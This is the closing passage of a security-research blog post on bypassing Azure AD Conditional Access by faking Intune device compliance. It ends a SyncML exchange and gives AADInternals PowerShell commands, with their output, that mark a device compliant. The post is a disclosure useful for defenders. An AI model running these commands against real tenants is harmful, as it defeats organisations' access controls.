		<span class="nt">&lt;/Source&gt;</span>
		<span class="nt">&lt;Meta&gt;</span>
			<span class="nt">&lt;MaxMsgSize</span> <span class="na">xmlns=</span><span class="s">&#34;syncml:metinf&#34;</span><span class="nt">&gt;</span>524288<span class="nt">&lt;/MaxMsgSize&gt;</span>
		<span class="nt">&lt;/Meta&gt;</span>
	<span class="nt">&lt;/SyncHdr&gt;</span>
	<span class="nt">&lt;SyncBody&gt;</span>
		<span class="nt">&lt;Status&gt;</span>
			<span class="nt">&lt;CmdID&gt;</span>1<span class="nt">&lt;/CmdID&gt;</span>
			<span class="nt">&lt;MsgRef&gt;</span>1<span class="nt">&lt;/MsgRef&gt;</span>
			<span class="nt">&lt;CmdRef&gt;</span>0<span class="nt">&lt;/CmdRef&gt;</span>
			<span class="nt">&lt;Cmd&gt;</span>SyncHdr<span class="nt">&lt;/Cmd&gt;</span>
			<span class="nt">&lt;Data&gt;</span>200<span class="nt">&lt;/Data&gt;</span>
		<span class="nt">&lt;/Status&gt;</span>
		<span class="nt">&lt;Get&gt;</span>
			<span class="nt">&lt;CmdID&gt;</span>2<span class="nt">&lt;/CmdID&gt;</span>
			<span class="nt">&lt;Item&gt;</span>
				<span class="nt">&lt;Target&gt;</span>
					<span class="nt">&lt;LocURI&gt;</span>./Vendor/MSFT/NodeCache/MS%20DM%20Server<span class="nt">&lt;/LocURI&gt;</span>
				<span class="nt">&lt;/Target&gt;</span>
			<span class="nt">&lt;/Item&gt;</span>
		<span class="nt">&lt;/Get&gt;</span>
		<span class="nt">&lt;Get&gt;</span>
			<span class="nt">&lt;CmdID&gt;</span>3<span class="nt">&lt;/CmdID&gt;</span>
			<span class="nt">&lt;Item&gt;</span>
				<span class="nt">&lt;Target&gt;</span>
					<span class="nt">&lt;LocURI&gt;</span>./Vendor/MSFT/NodeCache/MS%20DM%20Server/CacheVersion<span class="nt">&lt;/LocURI&gt;</span>
				<span class="nt">&lt;/Target&gt;</span>
			<span class="nt">&lt;/Item&gt;</span>
		<span class="nt">&lt;/Get&gt;</span>
		<span class="nt">&lt;Get&gt;</span>
			<span class="nt">&lt;CmdID&gt;</span>4<span class="nt">&lt;/CmdID&gt;</span>
			<span class="nt">&lt;Item&gt;</span>
				<span class="nt">&lt;Target&gt;</span>
					<span class="nt">&lt;LocURI&gt;</span>./Vendor/MSFT/NodeCache/MS%20DM%20Server/ChangedNodes<span class="nt">&lt;/LocURI&gt;</span>
				<span class="nt">&lt;/Target&gt;</span>
			<span class="nt">&lt;/Item&gt;</span>
		<span class="nt">&lt;/Get&gt;</span>
		<span class="nt">&lt;Get&gt;</span>
			<span class="nt">&lt;CmdID&gt;</span>5<span class="nt">&lt;/CmdID&gt;</span>
			<span class="nt">&lt;Item&gt;</span>
				<span class="nt">&lt;Target&gt;</span>
					<span class="nt">&lt;LocURI&gt;</span>./DevDetail/SwV<span class="nt">&lt;/LocURI&gt;</span>
				<span class="nt">&lt;/Target&gt;</span>
			<span class="nt">&lt;/Item&gt;</span>
		<span class="nt">&lt;/Get&gt;</span>
		<span class="nt">&lt;Get&gt;</span>
			<span class="nt">&lt;CmdID&gt;</span>6<span class="nt">&lt;/CmdID&gt;</span>
			<span class="nt">&lt;Item&gt;</span>
				<span class="nt">&lt;Target&gt;</span>
					<span class="nt">&lt;LocURI&gt;</span>./DevDetail/Ext/Microsoft/LocalTime<span class="nt">&lt;/LocURI&gt;</span>
				<span class="nt">&lt;/Target&gt;</span>
			<span class="nt">&lt;/Item&gt;</span>
		<span class="nt">&lt;/Get&gt;</span>
		<span class="nt">&lt;Get&gt;</span>
			<span class="nt">&lt;CmdID&gt;</span>7<span class="nt">&lt;/CmdID&gt;</span>
			<span class="nt">&lt;Item&gt;</span>
				<span class="nt">&lt;Target&gt;</span>
					<span class="nt">&lt;LocURI&gt;</span>./Vendor/MSFT/WindowsLicensing/Edition<span class="nt">&lt;/LocURI&gt;</span>
				<span class="nt">&lt;/Target&gt;</span>
			<span class="nt">&lt;/Item&gt;</span>
		<span class="nt">&lt;/Get&gt;</span>
		<span class="nt">&lt;Get&gt;</span>
			<span class="nt">&lt;CmdID&gt;</span>8<span class="nt">&lt;/CmdID&gt;</span>
			<span class="nt">&lt;Item&gt;</span>
				<span class="nt">&lt;Target&gt;</span>
					<span class="nt">&lt;LocURI&gt;</span>./Vendor/MSFT/Update/LastSuccessfulScanTime<span class="nt">&lt;/LocURI&gt;</span>
				<span class="nt">&lt;/Target&gt;</span>
			<span class="nt">&lt;/Item&gt;</span>
		<span class="nt">&lt;/Get&gt;</span>
		<span class="nt">&lt;Get&gt;</span>
			<span class="nt">&lt;CmdID&gt;</span>9<span class="nt">&lt;/CmdID&gt;</span>
			<span class="nt">&lt;Item&gt;</span>
				<span class="nt">&lt;Target&gt;</span>
					<span class="nt">&lt;LocURI&gt;</span>./Vendor/MSFT/DeviceStatus/OS/Mode<span class="nt">&lt;/LocURI&gt;</span>
				<span class="nt">&lt;/Target&gt;</span>
			<span class="nt">&lt;/Item&gt;</span>
		<span class="nt">&lt;/Get&gt;</span>
		<span class="nt">&lt;Final</span> <span class="nt">/&gt;</span>
	<span class="nt">&lt;/SyncBody&gt;</span>
<span class="nt">&lt;/SyncML&gt;</span></code></pre></div></p>

<h2 id="marking-device-compliant-option-2-aad-graph-api">Marking device compliant - option 2: AAD Graph API</h2>

<p>As I mentioned earlier, <a href="https://docs.microsoft.com/en-us/windows/client-management/mdm/azure-active-directory-integration-with-mdm#use-azure-ad-graph-api" target="_blank">Azure Active Directory integration with MDM</a> documentation
states that MDM clients can report their compliance status to Azure AD. However, the document also states that [Sep 29th 2020]:</p>

<blockquote>
<p>This is only applicable for approved MDM apps on Windows 10 devices.</p>
</blockquote>

<p>Wait a minute! Does this mean that the MDM client can directly report its compliance status to Azure AD? Oh yes it does!</p>

<p>Based on my tests, Azure AD doesn&rsquo;t seem to care about which client is reporting the status. In some tenants with some devices
I was able to mark devices compliant as a regular user. However, I couldn&rsquo;t find any logic behind the behaviour, some users were able to do this while others couldn&rsquo;t.
So this clearly requires more research.</p>

<p>Anyways, AADInternals v0.4.0 contains functions for marking devices compliant and for listing their compliance status.</p>

<p>To check the compliance status of the device, use the following commands:
<div class="highlight"><pre class="chroma"><code class="language-powershell" data-lang="powershell"><span class="c"># Get access token </span>
<span class="nb">Get-AADIntAccessTokenForAADGraph</span> <span class="n">-SaveToCache</span>

<span class="c"># Get the device compliance</span>
<span class="nb">Get-AADIntDeviceCompliance</span> <span class="n">-DeviceId</span> <span class="s2">&#34;d03994c9-24f8-41ba-a156-1805998d6dc7&#34;</span></code></pre></div></p>

<pre><code>displayName           : SixByFour
objectId              : 2eaa21a1-6362-4d3f-afc4-597592217ef0
deviceId              : d03994c9-24f8-41ba-a156-1805998d6dc7
isCompliant           : False
isManaged             : True
deviceOwnership       : Company
deviceManagementAppId : 0000000a-0000-0000-c000-000000000000
</code></pre>

<p>As we can see, the device is managed but not compliant. To set it compliant, use the following command:
<div class="highlight"><pre class="chroma"><code class="language-powershell" data-lang="powershell"><span class="c"># Set the device compliant</span>
<span class="nb">Set-AADIntDeviceCompliant</span> <span class="n">-DeviceId</span> <span class="s2">&#34;d03994c9-24f8-41ba-a156-1805998d6dc7&#34;</span> <span class="n">-Compliant</span></code></pre></div></p>

<pre><code>displayName           : SixByFour
objectId              : 2eaa21a1-6362-4d3f-afc4-597592217ef0
deviceId              : d03994c9-24f8-41ba-a156-1805998d6dc7
isCompliant           : True
isManaged             : True
deviceOwnership       : Company
deviceManagementAppId : 0000000a-0000-0000-c000-000000000000
</code></pre>

<p><strong>Note!</strong> As I mentioned above, this sometimes work, sometimes not. It seems that the user changing
the status should be administrator. I still need to figure out the logic here but
in the mean time feel free to try!</p>

<h1 id="summary">Summary</h1>

<p>Enrolling devices to Intune is a requirement for using the compliance state in Conditional Access (CA) policies.
As I demonstrated, this does not mean that they would actually be compliant! Emulating Intune client to give Intune &ldquo;the right answers&rdquo;
can be used make imaginary devices compliant and to bypass compliance related CA policies.</p>

<h1 id="references">References</h1>

<ul>
<li>Microsoft: <a href="https://docs.microsoft.com/en-us/azure/active-directory/conditional-access/overview" target="_blank">What is Conditional Access?</a></li>
<li>Microsoft: <a href="https://docs.microsoft.com/en-us/mem/intune/fundamentals/what-is-intune" target="_blank">Microsoft Intune is an MDM and MAM provider for your devices</a></li>
<li>Microsoft: <a href="https://docs.microsoft.com/en-us/windows/client-management/mdm/azure-active-directory-integration-with-mdm#use-azure-ad-graph-api" target="_blank">Azure Active Directory integration with MDM</a></li>
<li>Microsoft: <a href="https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-mdm/33769a92-ac31-47ef-ae7b-dc8501f7104f" target="_blank">[MS-MDM]: Mobile Device Management Protocol</a></li>
<li>Microsoft: <a href="https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-mde2/4d7eadd5-3951-4f1c-8159-c39e07cbe692" target="_blank">[MS-MDE2]: Mobile Device Enrollment Protocol Version 2</a></li>
<li>Microsoft: <a href="https://docs.microsoft.com/en-us/mem/intune/protect/device-compliance-get-started" target="_blank">Use compliance policies to set rules for devices you manage with Intune</a></li>
<li>Microsoft: <a href="https://docs.microsoft.com/en-us/windows/client-management/mdm/oma-dm-protocol-support" target="_blank">OMA DM protocol support</a></li>
</ul>
		</div>
		
<div class="post__tags tags clearfix">
	<img class="icon icon-tag" src="/images/tags.png" width="16" height="16" viewBox="0 0 16 16">
	
	<ul class="tags__list">
		<li class="tags__item"><a class="tags__link" href="/tags/azure-active-directory/" rel="tag">Azure Active Directory</a></li>
		<li class="tags__item"><a class="tags__link" href="/tags/azure/" rel="tag">Azure</a></li>
		<li class="tags__item"><a class="tags__link" href="/tags/security/" rel="tag">security</a></li>
		<li class="tags__item"><a class="tags__link" href="/tags/mfa/" rel="tag">MFA</a></li>
		<li class="tags__item"><a class="tags__link" href="/tags/prt/" rel="tag">PRT</a></li>
		<li class="tags__item"><a class="tags__link" href="/tags/mdm/" rel="tag">MDM</a></li>
		<li class="tags__item"><a class="tags__link" href="/tags/intune/" rel="tag">Intune</a></li>
	</ul>
</div>

		<div class="post__tags tags clearfix">
<ul class="tags__list">
	<li class="tags__item"><a class="tags__link" href="http://twitter.com/intent/tweet?url=http%3a%2f%2fo365blog.com%2fpost%2fmdm%2f&text=Bypassing%20conditional%20access%20by%20faking%20device%20compliance.&tw_p=tweetbutton" title="Share in Twitter" target="_blank" rel="nofollow"><i class="fa fa-twitter" aria-hidden="true"></i></a></li>
	<li class="tags__item"><a class="tags__link" href="https://www.linkedin.com/shareArticle?url=http%3a%2f%2fo365blog.com%2fpost%2fmdm%2f&mini=true&title=Bypassing%20conditional%20access%20by%20faking%20device%20compliance.&summary=&source=o365blog.com" title="Share in LinkedIn" target="_blank" rel="nofollow"><i class="fa fa-linkedin" aria-hidden="true"></i></a></li>
</ul>
</div>
	</article>
	
<div class="authorbox clearfix">
	<figure class="authorbox__avatar">
		<img alt="Dr Nestori Syynimaa (@DrAzureAD) avatar" src="/images/nestori.jpg" class="avatar" height="90" width="90">
	</figure>
	<div class="authorbox__header">
		<span class="authorbox__name">About Dr Nestori Syynimaa (@DrAzureAD)</span>
	</div>
	<div class="authorbox__description">
		Dr Syynimaa works as Senior Principal Information Security Researcher at Secureworks CTU (Counter Threat Unit). <br> Before moving to his current position, Dr Syynimaa worked as a CIO, consultant, trainer, and university lecturer for over 20 years. He is a regular speaker in scientific and professional conferences related to Microsoft 365 and Azure AD security. <br><br>Dr Syynimaa is Microsoft Certified Expert (Microsoft 365), Microsoft Certified Azure Solutions Architect Expert, Microsoft Certified Trainer, Microsoft MVP (Enterprise Mobility, Identity and Access &amp; Intune), and Microsoft Most Valuable Security Researcher (MVR).
	</div>
</div>
	
<nav class="post-nav row clearfix" itemscope="itemscope" itemtype="http://schema.org/SiteNavigationElement">
	<div class="post-nav__item post-nav__item--prev col-1-2">
		<a class="post-nav__link" href="/post/prt/" rel="prev"><span class="post-nav__caption">«Previous</span><p class="post-nav__post-title">Journey to Azure AD PRT: Getting access with pass-the-token and pass-the-cert</p></a>
	</div>
	<div class="post-nav__item post-nav__item--next col-1-2">
		<a class="post-nav__link" href="/post/cloudshell/" rel="next"><span class="post-nav__caption">Next»</span><p class="post-nav__post-title">Using Azure Cloud Shell from PowerShell</p></a>
	</div>
</nav>

	
<div class="comments">
	<div id="disqus_thread"></div>
<script>
    var disqus_config = function () {
    
    
    
    };
    (function() {
        if (["localhost", "127.0.0.1"].indexOf(window.location.hostname) != -1) {
            document.getElementById('disqus_thread').innerHTML = 'Disqus comments not available by default when the website is previewed locally.';
            return;
        }
        var d = document, s = d.createElement('script'); s.async = true;
        s.src = '//' + "o365blog-com" + '.disqus.com/embed.js';
        s.setAttribute('data-timestamp', +new Date());
        (d.head || d.body).appendChild(s);
    })();
</script>
<noscript>Please enable JavaScript to view the <a href="https://disqus.com/?ref_noscript">comments powered by Disqus.</a></noscript>
<a href="https://disqus.com" class="dsq-brlink">comments powered by <span class="logo-disqus">Disqus</span></a>
</div>

</main>

<aside class="sidebar" itemscope="itemscope" itemtype="http://schema.org/WPSideBar">
	
<div class="widget-search widget">
	<form class="widget-search__form" role="search" method="get" action="//google.com/search">
		<label>
			<span class="screen-reader-text">Search for:</span>
			<input class="widget-search__field" type="search" placeholder="SEARCH..." value="" name="q">
		</label>
		<input class="widget-search__submit" type="submit" value="Search">
		<input type="hidden" name="sitesearch" value="http://o365blog.com" />
	</form>
</div>
	
<div class="widget-recent widget">
	<h4 class="widget__title">Recent Posts</h4>
	<div class="widget__content">
		<ul class="widget__list">
			<li class="widget__item"><a class="widget__link" href="/post/pta/">Exploiting Azure AD PTA vulnerabilities: Creating backdoor and harvesting credentials</a></li>
			<li class="widget__item"><a class="widget__link" href="/post/gmsa/">Hunt for the gMSA secrets</a></li>
			<li class="widget__item"><a class="widget__link" href="/post/august_2022/">AADInternals World Tour August 2022: USA</a></li>
			<li class="widget__item"><a class="widget__link" href="/post/deviceidentity/">Stealing and faking Azure AD device identities</a></li>
			<li class="widget__item"><a class="widget__link" href="/post/partners/">Microsoft partners: The Good, The Bad, or The Ugly?</a></li>
		</ul>
	</div>
</div>

	
<div class="widget-categories widget">
	<h4 class="widget__title">Categories</h4>
	<div class="widget__content">
		<ul class="widget__list">
			<li class="widget__item"><a class="widget__link" href="/categories/"></a></li>
			<li class="widget__item"><a class="widget__link" href="/categories/article">Article</a></li>
			<li class="widget__item"><a class="widget__link" href="/categories/blog">Blog</a></li>
		</ul>
	</div>
</div>
	
<div class="widget-social widget">
	<h4 class="widget-social__title widget__title">Social</h4>
	<div class="widget-social__content widget__content">
		<div class="widget-social__item widget__item">
			<a class="widget-social__link widget__link btn" title="Twitter" rel="noopener noreferrer" href="https://twitter.com/DrAzureAD" target="_blank">
				<svg class="widget-social__link-icon icon-twitter" viewBox="0 0 384 312" width="24" height="24" xmlns="http://www.w3.org/2000/svg" fill="#fff"><path d="m384 36.9c-14.1 6.3-29.3 10.5-45.2 12.4 16.3-9.7 28.8-25.2 34.6-43.6-15.2 9-32.1 15.6-50 19.1-14.4-15.2-34.9-24.8-57.5-24.8-43.5 0-78.8 35.3-78.8 78.8 0 6.2.7 12.2 2 17.9-65.5-3.3-123.5-34.6-162.4-82.3-6.7 11.6-10.6 25.2-10.6 39.6 0 27.3 13.9 51.4 35 65.6-12.9-.4-25.1-4-35.7-9.9v1c0 38.2 27.2 70 63.2 77.2-6.6 1.8-13.6 2.8-20.8 2.8-5.1 0-10-.5-14.8-1.4 10 31.3 39.1 54.1 73.6 54.7-27 21.1-60.9 33.7-97.8 33.7-6.4 0-12.6-.4-18.8-1.1 34.9 22.4 76.3 35.4 120.8 35.4 144.9 0 224.1-120 224.1-224.1 0-3.4-.1-6.8-.2-10.2 15.4-11.1 28.7-25 39.3-40.8z"/></svg>
				<span>Twitter</span>
			</a>
		</div>
		<div class="widget-social__item widget__item">
			<a class="widget-social__link widget__link btn" title="" rel="noopener noreferrer" href="https://linkedin.com/in/nestori" target="_blank">
				<svg class="widget-social__link-icon icon-linkedin" viewBox="0 0 352 352" width="24" height="24" fill="#fff" xmlns="http://www.w3.org/2000/svg"><path d="M0,40v272c0,21.9,18.1,40,40,40h272c21.9,0,40-18.1,40-40V40c0-21.9-18.1-40-40-40H40C18.1,0,0,18.1,0,40z M312,32 c4.6,0,8,3.4,8,8v272c0,4.6-3.4,8-8,8H40c-4.6,0-8-3.4-8-8V40c0-4.6,3.4-8,8-8H312z M59.5,87c0,15.2,12.3,27.5,27.5,27.5 c15.2,0,27.5-12.3,27.5-27.5c0-15.2-12.3-27.5-27.5-27.5C71.8,59.5,59.5,71.8,59.5,87z M187,157h-1v-21h-45v152h47v-75 c0-19.8,3.9-39,28.5-39c24.2,0,24.5,22.4,24.5,40v74h47v-83.5c0-40.9-8.7-72-56.5-72C208.5,132.5,193.3,145.1,187,157z M64,288h47.5 V136H64V288z"/></svg>
				<span>LinkedIn</span>
			</a>
		</div>
		<div class="widget-social__item widget__item">
			<a class="widget-social__link widget__link btn" title="Email" href="mailto:nestori.syynimaa@gerenios.com">
				<svg class="widget-social__link-icon icon-mail" viewBox="0 0 416 288" width="24" height="24" xmlns="http://www.w3.org/2000/svg" fill="#fff"><path d="m0 16v256 16h16 384 16v-16-256-16h-16-384-16zm347 16-139 92.5-139-92.5zm-148 125.5 9 5.5 9-5.5 167-111.5v210h-352v-210z"/></svg>
				<span>nestori.syynimaa@gerenios.com</span>
			</a>
		</div>
	</div>
</div>

	
<div class="widget-taglist widget">
	<h4 class="widget__title">Tags</h4>
	<div class="widget__content">
		<a class="widget__link widget__link--taglist" href="/tags/aadconnect" title="aadconnect">aadconnect (2)</a>
		<a class="widget__link widget__link--taglist" href="/tags/aadinternals" title="aadinternals">aadinternals (10)</a>
		<a class="widget__link widget__link--taglist" href="/tags/abusing" title="abusing">abusing (1)</a>
		<a class="widget__link widget__link--taglist" href="/tags/active-directory" title="active-directory">active-directory (1)</a>
		<a class="widget__link widget__link--taglist" href="/tags/adfs" title="adfs">adfs (5)</a>
		<a class="widget__link widget__link--taglist" href="/tags/admin" title="admin">admin (3)</a>
		<a class="widget__link widget__link--taglist" href="/tags/administration" title="administration">administration (1)</a>
		<a class="widget__link widget__link--taglist" href="/tags/authentication" title="authentication">authentication (1)</a>
		<a class="widget__link widget__link--taglist" href="/tags/azure" title="azure">azure (20)</a>
		<a class="widget__link widget__link--taglist" href="/tags/azure-active-directory" title="azure-active-directory">azure-active-directory (27)</a>
		<a class="widget__link widget__link--taglist" href="/tags/azuread" title="azuread">azuread (4)</a>
		<a class="widget__link widget__link--taglist" href="/tags/backdoor" title="backdoor">backdoor (1)</a>
		<a class="widget__link widget__link--taglist" href="/tags/blackhat" title="blackhat">blackhat (2)</a>
		<a class="widget__link widget__link--taglist" href="/tags/blue-team" title="blue-team">blue-team (1)</a>
		<a class="widget__link widget__link--taglist" href="/tags/bprt" title="bprt">bprt (2)</a>
		<a class="widget__link widget__link--taglist" href="/tags/browser" title="browser">browser (1)</a>
		<a class="widget__link widget__link--taglist" href="/tags/compromise" title="compromise">compromise (1)</a>
		<a class="widget__link widget__link--taglist" href="/tags/conferences" title="conferences">conferences (1)</a>
		<a class="widget__link widget__link--taglist" href="/tags/defcon" title="defcon">defcon (1)</a>
		<a class="widget__link widget__link--taglist" href="/tags/desktop-sso" title="desktop-sso">desktop-sso (1)</a>
		<a class="widget__link widget__link--taglist" href="/tags/device" title="device">device (3)</a>
		<a class="widget__link widget__link--taglist" href="/tags/dns" title="dns">dns (3)</a>
		<a class="widget__link widget__link--taglist" href="/tags/email" title="email">email (2)</a>
		<a class="widget__link widget__link--taglist" href="/tags/encryption" title="encryption">encryption (1)</a>
		<a class="widget__link widget__link--taglist" href="/tags/exchange" title="exchange">exchange (1)</a>
		<a class="widget__link widget__link--taglist" href="/tags/federation" title="federation">federation (2)</a>
		<a class="widget__link widget__link--taglist" href="/tags/forensics" title="forensics">forensics (1)</a>
		<a class="widget__link widget__link--taglist" href="/tags/gdpr" title="gdpr">gdpr (1)</a>
		<a class="widget__link widget__link--taglist" href="/tags/global-administrator" title="global-administrator">global-administrator (1)</a>
		<a class="widget__link widget__link--taglist" href="/tags/graph" title="graph">graph (1)</a>
		<a class="widget__link widget__link--taglist" href="/tags/groups" title="groups">groups (1)</a>
		<a class="widget__link widget__link--taglist" href="/tags/guest" title="guest">guest (2)</a>
		<a class="widget__link widget__link--taglist" href="/tags/hybrid-join" title="hybrid-join">hybrid-join (3)</a>
		<a class="widget__link widget__link--taglist" href="/tags/identity" title="identity">identity (2)</a>
		<a class="widget__link widget__link--taglist" href="/tags/inactive" title="inactive">inactive (1)</a>
		<a class="widget__link widget__link--taglist" href="/tags/insider" title="insider">insider (1)</a>
		<a class="widget__link widget__link--taglist" href="/tags/intune" title="intune">intune (1)</a>
		<a class="widget__link widget__link--taglist" href="/tags/join" title="join">join (3)</a>
		<a class="widget__link widget__link--taglist" href="/tags/logs" title="logs">logs (1)</a>
		<a class="widget__link widget__link--taglist" href="/tags/mailbox" title="mailbox">mailbox (1)</a>
		<a class="widget__link widget__link--taglist" href="/tags/mdm" title="mdm">mdm (1)</a>
		<a class="widget__link widget__link--taglist" href="/tags/mfa" title="mfa">mfa (6)</a>
		<a class="widget__link widget__link--taglist" href="/tags/office-365" title="office-365">office-365 (9)</a>
		<a class="widget__link widget__link--taglist" href="/tags/office365" title="office365">office365 (9)</a>
		<a class="widget__link widget__link--taglist" href="/tags/on-prem" title="on-prem">on-prem (2)</a>
		<a class="widget__link widget__link--taglist" href="/tags/onedrive" title="onedrive">onedrive (1)</a>
		<a class="widget__link widget__link--taglist" href="/tags/outsider" title="outsider">outsider (2)</a>
		<a class="widget__link widget__link--taglist" href="/tags/partner" title="partner">partner (2)</a>
		<a class="widget__link widget__link--taglist" href="/tags/password" title="password">password (1)</a>
		<a class="widget__link widget__link--taglist" href="/tags/persistence" title="persistence">persistence (1)</a>
		<a class="widget__link widget__link--taglist" href="/tags/phishing" title="phishing">phishing (2)</a>
		<a class="widget__link widget__link--taglist" href="/tags/planner" title="planner">planner (1)</a>
		<a class="widget__link widget__link--taglist" href="/tags/powershell" title="powershell">powershell (13)</a>
		<a class="widget__link widget__link--taglist" href="/tags/prt" title="prt">prt (6)</a>
		<a class="widget__link widget__link--taglist" href="/tags/pta" title="pta">pta (2)</a>
		<a class="widget__link widget__link--taglist" href="/tags/recon" title="recon">recon (2)</a>
		<a class="widget__link widget__link--taglist" href="/tags/reconnaissance" title="reconnaissance">reconnaissance (4)</a>
		<a class="widget__link widget__link--taglist" href="/tags/seamless-sso" title="seamless-sso">seamless-sso (1)</a>
		<a class="widget__link widget__link--taglist" href="/tags/security" title="security">security (31)</a>
		<a class="widget__link widget__link--taglist" href="/tags/sso" title="sso">sso (2)</a>
		<a class="widget__link widget__link--taglist" href="/tags/sync" title="sync">sync (1)</a>
		<a class="widget__link widget__link--taglist" href="/tags/synchronisation" title="synchronisation">synchronisation (1)</a>
		<a class="widget__link widget__link--taglist" href="/tags/t2" title="t2">t2 (1)</a>
		<a class="widget__link widget__link--taglist" href="/tags/talks" title="talks">talks (1)</a>
		<a class="widget__link widget__link--taglist" href="/tags/teams" title="teams">teams (3)</a>
		<a class="widget__link widget__link--taglist" href="/tags/user" title="user">user (1)</a>
		<a class="widget__link widget__link--taglist" href="/tags/virtual-machine" title="virtual-machine">virtual-machine (1)</a>
	</div>
</div>
</aside>

	</div>
		<footer class="footer" itemscope="itemscope" itemtype="http://schema.org/WPFooter">
			<div class="container container-inner">
				<p class="footer__copyright"><span><a href="https://creativecommons.org/licenses/by/4.0/" target="_blank"><img src="/images/CC-BY.png"></a> </span></p>
			</div>
		</footer>
	</div>

<script>
	var navigation = responsiveNav(".menu", {
		navClass: "menu--collapse",
	});
</script>
</body>
</html>
